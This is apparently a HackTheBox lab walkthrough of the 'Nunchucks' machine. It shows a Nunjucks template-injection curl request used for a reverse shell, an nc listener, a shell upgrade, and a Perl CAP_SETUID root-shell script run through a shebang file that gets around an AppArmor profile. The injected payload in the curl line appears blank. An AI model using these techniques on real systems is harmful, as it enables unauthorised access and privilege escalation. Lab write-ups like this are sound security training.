Nunchucks from HackTheBox — Detailed Walkthrough
Showing you all the tools and techniques needed to complete the box.
Machine Information
Nunchucks is an easy machine on HackTheBox. We start with enumeration and find a website on a subdomain that’s vulnerable to server side template injections. More exploration finds a vulnerable template engine that we exploit to get a reverse shell. Escalation to root is via a capability set on the perl binary. Using a GTFOBins example we exploit this to get a root shell.
Skills required are basic scanning and enumeration techniques. Skills learned are finding and using publicly available exploits.
Initial Recon
As always let’s start with Nmap:
We see three open ports, with 443 revealing a hostname, let’s add that to /etc/hosts:
┌──(root💀kali)-[~/nunchucks]
└─# echo "10.10.11.122 nunchucks.htb" >> /etc/hosts
Website
From Nmap above we see HTTP on port 80 redirects to HTTPS on port 443. Visiting the site we see it’s an online shop creation platform:
Gobuster
Looking around it’s just a basic template of a site. There’s a form to sign up for an account, but if you try then it says registrations are closed for now. Under the Links section at the bottom it mentions there is a store coming soon. We also know from past CTF that there are often vhosts so let’s try scanning:
We find the store! Add to hosts file first:
┌──(root💀kali)-[~]
└─# sed -i '/10.10.11.122 nunchucks.htb/ s/$/ store.nunchucks.htb/' /etc/hosts
Nunchucks Store
Now let’s have a look:
After some playing around we find this form is vulnerable to server side template injection (SSTI):
SSTI
Like we saw on Bolt we can use examples from HackTricks to confirm. Above we see the response of 49 confirms the payload of 7 * 7 was evaluated on the server side and the answer returned to the page.
Now we know its vulnerable we need a way to exploit it. Looking at Wappalyzer it detects the web framework used as Express:
Following the Wappalyzer link here there’s more information about the framework and a link that takes us to the ExpressJS website. Looking around there we find something interesting under the resources section:
There’s a template engine called Nunjucks, which is very suspicious as that is almost the same name as this box. Following that we end up at a Github repo here. A search for “nunjucks ssti” finds this and then to this. This last article explains a sandbox break out which can easily be followed by using the described payload:
We just need to escape the single and double quotes by putting a backslash in front of them, then use curl to deliver:
Reverse Shell
I’ve used sed to tidy up the output and make it more readable. With that working let’s try for a reverse shell:
┌──(root💀kali)-[~/htb/nunchucks]
└─# curl -s -k -X POST -H $'Content-Type: application/json' --data-binary $'{\"email\":\"\"\x0d\x0a}' 'https://store.nunchucks.htb/api/submit'
Switch to a waiting nc listener to see our connection:
┌──(root💀kali)-[~/htb/nunchucks]
└─# nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.122] 60976
First let’s upgrade the shell to something more useable:
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
david@nunchucks:/var/www/store.nunchucks$ ^Z
zsh: suspended nc -nlvp 1337
┌──(root💀kali)-[~/htb/nunchucks]
└─# stty raw -echo; fg
[1] + continued nc -nlvp 1337
david@nunchucks:/var/www/store.nunchucks$
User Flag
With that sorted let’s get the user flag:
david@nunchucks:/var/www/store.nunchucks$ cat /home/david/user.txt
<HIDDEN>
After some enumeration I found a Perl script in /opt:
david@nunchucks:/var/www/store.nunchucks$ ls -lsa /opt
4 -rwxr-xr-x 1 root root 838 Sep 1 12:53 backup.pl
4 drwxr-xr-x 2 root root 4096 Oct 28 17:03 web_backups
Setuid Exploit
Looking at the script the first section has setuid(0):
david@nunchucks:/var/www/store.nunchucks$ cat /opt/backup.pl
#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid);
POSIX::setuid(0);
The rest of the script is taking the contents of /var/www and backing it up to /tmp then moving it to /opt. The interesting part is that setuid command at the start. On a previous TryHackMe box called Wonderland I used this same capability. The GTFOBins article here explains how we can exploit this:
If the binary has the Linux CAP_SETUID capability set or it is executed by another
binary with the capability set, it can be used as a backdoor to maintain privileged
access by manipulating its own process UID.
If we check the perl binary we see it has CAP_SETUID set:
david@nunchucks:/var/www/store.nunchucks$ getcap /usr/bin/perl
/usr/bin/perl = cap_setuid+ep
Using the provided exploit from GTFOBins does nothing:
david@nunchucks:/tmp$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
david@nunchucks:/tmp$
Why is this? Well it turns out the box has Apparmor enabled for Perl. Useful info here from Ubuntu on it’s usage. If we look in /etc/apparmor.d as described in the article we see there is a profile for Perl:
david@nunchucks:/tmp$ ls -lsa /etc/apparmor.d/usr.bin.*
-rw-r--r-- 1 root root 202 Feb 25 2020 /etc/apparmor.d/usr.bin.man
-rw-r--r-- 1 root root 442 Sep 26 01:16 /etc/apparmor.d/usr.bin.perl
Looking at the file we can see it’s blocking us, but we can bypass this by using a .pl file with the Perl shebang in it and made executable. A little info here but it’s simple enough.
Root Flag
Echo the same commands from GTFOBins to a file on the box:
david@nunchucks:/tmp$ echo '#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/sh";' > pencer.pl
Now make it executable then call it direct:
david@nunchucks:/tmp$ chmod +x pencer.pl
david@nunchucks:/tmp$ ./pencer.pl
# id
uid=0(root) gid=1000(david) groups=1000(david)
# cat /root/root.txt
<HIDDEN>
And there we go. Another box rooted, see you next time.
If you liked this article please leave me a clap or two (it’s free!)
Twitter — https://twitter.com/pencer_io
Website — https://pencer.io
Originally published at https://pencer.io on May 19, 2022.